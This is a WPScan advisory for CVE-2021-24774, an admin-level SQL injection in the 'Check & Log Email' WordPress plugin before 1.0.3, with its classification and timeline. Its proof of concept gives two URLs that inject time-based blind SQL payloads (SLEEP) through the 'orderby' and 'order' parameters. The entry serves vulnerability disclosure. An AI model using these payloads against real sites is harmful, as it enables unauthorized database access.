WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Check & Log Email < 1.0.3 - Admin+ SQL Injections

Description

The plugin does not validate and escape the "order" and "orderby" GET parameters before using them in a SQL statement when viewing logs, leading to SQL injections issues

Proof of Concept

With the 'Enable Log' settings (of the plugin) activated:
- https://example.com/wp-admin/admin.php?page=check-email-logs&orderby=sent_date+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)&order=DESC
- https://example.com/wp-admin/admin.php?page=check-email-logs&orderby=sent_date&order=+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)

Affects Plugins

check-email
Fixed in version 1.0.4

References

CVE
CVE-2021-24774

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

bl4derunner

Submitter

Anton Sarsadskikh

Verified

Yes

WPVDB ID
f80ef09a-d3e2-4d62-8532-f0ebe59ae110

Timeline

Publicly Published

2021-09-27 (about 9 months ago)

Added

2021-09-27 (about 9 months ago)

Last Updated

2022-04-14 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin